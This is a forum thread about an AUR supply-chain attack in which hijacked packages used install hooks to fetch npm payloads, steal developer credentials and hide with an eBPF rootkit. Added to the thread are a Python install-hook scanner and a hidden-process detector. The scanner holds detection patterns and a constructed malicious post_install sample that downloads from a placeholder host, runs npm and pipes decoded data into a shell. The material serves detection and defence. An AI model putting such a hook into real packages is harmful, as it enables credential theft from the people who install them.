Atomic Arch: 900+ AUR Packages Backdoored with eBPF Rootkit (thecybersecguru.com)
from WPSteam@lemmy.world to cybersecurity@infosec.pub on 13 Jun 14:48
https://lemmy.world/post/48117869

Atomic Arch is a major AUR supply-chain attack (over 1.5K packages affected as of now) where attackers hijacked orphaned Arch packages and used malicious install hooks to pull npm payloads that executed a Linux ELF infostealer. It targeted developer secrets like SSH keys, GitHub/npm tokens, browser sessions, Docker/Vault credentials, and chat app data, while also using an eBPF rootkit to hide itself when run as root.

#cybersecurity
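A check a practitioner would want after reading the post above: go through the pacman install hooks on a machine and flag the behaviours it describes (network fetches, npm/npx invocations, pipe-to-shell and base64 decoding inside post_install/post_upgrade). The scanner below is an added example written for this page, not code from the incident write-up or from any Arch tooling. The two .install scripts embedded in it are constructed for the demo, the indicator list is an assumption about what a legitimate hook should never need (it is not an indicator list published for this incident), and the registry.example.invalid URL is a placeholder.

```python
import glob
import re
import sys
from typing import Dict, List, Tuple

# Hook functions pacman runs from a package's .install script.
HOOK_NAMES = ("pre_install", "post_install", "pre_upgrade", "post_upgrade",
              "pre_remove", "post_remove")

# Indicators a legitimate install hook rarely needs. Assumed for this example,
# not indicators published for the incident.
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget|fetch)\b"),
    "npm_tooling":   re.compile(r"\b(npm|npx|node|yarn|pnpm)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b|\beval\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b"),
}

# Matches `post_install() {` and `function post_install {` style headers.
HOOK_HEADER = re.compile(
    r"^[ \t]*(?:function[ \t]+)?(" + "|".join(HOOK_NAMES) + r")[ \t]*(?:\([ \t]*\))?\s*\{",
    re.MULTILINE,
)


def extract_hooks(script: str) -> Dict[str, Tuple[int, str]]:
    """Return {hook_name: (line number of the opening brace, body)} for each hook.
    Braces are matched by depth count, which is enough for the flat shell these
    scripts normally contain (a `{` inside a quoted string would fool it)."""
    hooks = {}
    for m in HOOK_HEADER.finditer(script):
        depth, i = 1, m.end()
        while i < len(script) and depth:
            if script[i] == "{":
                depth += 1
            elif script[i] == "}":
                depth -= 1
            i += 1
        # The body starts right after `{`, so its first line is the header line.
        first_line = script.count("\n", 0, m.end()) + 1
        hooks[m.group(1)] = (first_line, script[m.end():i - 1])
    return hooks


def scan_install_script(script: str) -> List[dict]:
    """Flag indicator hits inside hook bodies; shell comments are ignored."""
    findings = []
    for hook, (first_line, body) in extract_hooks(script).items():
        for offset, line in enumerate(body.splitlines()):
            code = line.split("#", 1)[0]          # crude comment strip
            for label, pattern in SUSPICIOUS.items():
                if pattern.search(code):
                    findings.append({"hook": hook, "line": first_line + offset,
                                     "indicator": label, "text": line.strip()})
    return findings


def scan_files(paths) -> Dict[str, List[dict]]:
    """Scan install scripts on disk. pacman keeps the install script of every
    installed package at /var/lib/pacman/local/<name-version>/install."""
    report = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_install_script(fh.read())
        except OSError:
            continue
        if hits:
            report[path] = hits
    return report


# Constructed sample: a typical benign hook.
BENIGN_INSTALL = """\
post_install() {
  update-desktop-database -q
  gtk-update-icon-cache -q -t -f usr/share/icons/hicolor
}
post_upgrade() {
  post_install
}
"""

# Constructed sample of the pattern described in the post: a hook that fetches
# an npm payload and pipes decoded content into a shell. Placeholder URL.
MALICIOUS_INSTALL = """\
post_install() {
  # refresh font cache
  fc-cache -f
  mkdir -p /tmp/.cache
  curl -fsSL https://registry.example.invalid/pkg.tgz -o /tmp/.cache/p.tgz
  npm install --prefix /tmp/.cache /tmp/.cache/p.tgz >/dev/null 2>&1
  echo ZXhhbXBsZQ== | base64 -d | sh
}
post_upgrade() {
  post_install
}
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        targets = sys.argv[1:]
    else:
        targets = glob.glob("/var/lib/pacman/local/*/install")
    report = scan_files(targets)
    if not report:   # not on Arch, or nothing flagged: show the embedded sample
        report = {"<embedded sample>": scan_install_script(MALICIOUS_INSTALL)}
    for path, hits in report.items():
        for h in hits:
            print(f"{path}:{h['line']} [{h['hook']}] {h['indicator']}: {h['text']}")
```

Run it with no arguments on an Arch box to sweep every installed package's hook, or pass explicit .install or PKGBUILD paths from a build directory before running makepkg. Hits are a reason to read the hook by hand, not proof of compromise: a few legitimate packages do call out to the network from post_install, which is exactly why that pattern is worth reviewing.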


UnLocoPoco@lemmy.world on 14 Jun 14:55

Update: it seems like a 2nd wave of attack, a bit more sophisticated than the initial wave, has begun. The code is more obfuscated.

SamuelEllis@lemmy.world on 21 Jun 11:04

The use of eBPF hooks as a rootkit is particularly insidious because it leverages the kernel’s own tracing infrastructure to hide malicious processes, effectively bypassing standard process monitoring. This supply-chain compromise highlights the critical risk of relying on unverified third-party repositories, where a single malicious hook can persist across multiple package versions and silently exfiltrate sensitive credentials.
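The comment above describes the rootkit hiding processes from standard process monitoring. The classic counter-check is a cross-view comparison: enumerate PIDs by probing the kernel directly (kill with signal 0) and compare against what a directory listing of /proc shows, since a hook that filters readdir results can leave the process reachable by direct path or by PID probe. The script below is an added example written for this page, not code from the incident write-up or from any tool mentioned in it; it assumes Linux, and it is the generic technique rather than a detector tuned to this particular rootkit. A hider that also tampers with the probe path evades it, so treat a clean result as weak evidence, not a clean bill of health.

```python
import os
from typing import Dict, List, Optional


def listed_pids() -> set:
    """PIDs visible through a normal directory listing of /proc, which is what
    ps, top and most agents rely on (and what a readdir hook can filter)."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}


def pid_exists(pid: int) -> bool:
    """Probe a PID with signal 0: ESRCH means no such process, EPERM means it
    exists but belongs to another user (still a live process)."""
    try:
        os.kill(pid, 0)
        return True
    except ProcessLookupError:
        return False
    except PermissionError:
        return True


def read_status(pid: int) -> Dict[str, str]:
    """Read /proc/<pid>/status by direct path; a process hidden only from
    readdir is usually still reachable this way. Empty dict if unreadable."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            return dict(line.rstrip("\n").split(":\t", 1)
                        for line in fh if ":\t" in line)
    except OSError:
        return {}


def find_hidden_pids(max_pid: Optional[int] = None) -> List[dict]:
    """Cross-view check: every PID that answers a kill(pid, 0) probe but is
    missing from the /proc listing. Thread IDs also answer kill(), so a hit is
    only reported when /proc/<pid>/status says Tgid == Pid (a thread-group
    leader) or when /proc/<pid> is not reachable at all."""
    if not os.path.isdir("/proc"):
        return []
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    visible = listed_pids()
    hidden = []
    for pid in range(1, max_pid + 1):
        if pid in visible or not pid_exists(pid):
            continue
        status = read_status(pid)
        if status and status.get("Tgid") != str(pid):
            continue                      # a thread, not a hidden process
        if not pid_exists(pid):
            continue                      # exited between the two probes
        hidden.append({"pid": pid, "name": status.get("Name", "?"),
                       "proc_entry": bool(status)})
    # A process started during the sweep is not hidden, just new: re-list.
    visible_now = listed_pids()
    return [h for h in hidden if h["pid"] not in visible_now]


if __name__ == "__main__":
    hits = find_hidden_pids()
    for h in hits:
        print(f"hidden pid {h['pid']} name={h['name']} proc_entry={h['proc_entry']}")
    if not hits:
        print("no readdir-hidden processes found (weak evidence only)")
```

A hit with proc_entry=True means the process is filtered from the listing but its /proc directory still resolves, which is the signature of a hook on the directory-read path only; proc_entry=False means the kernel answered the PID probe while the /proc entry itself is unreachable, which deserves a look with bpftool prog list and a reboot from known-good media rather than further poking on the live system.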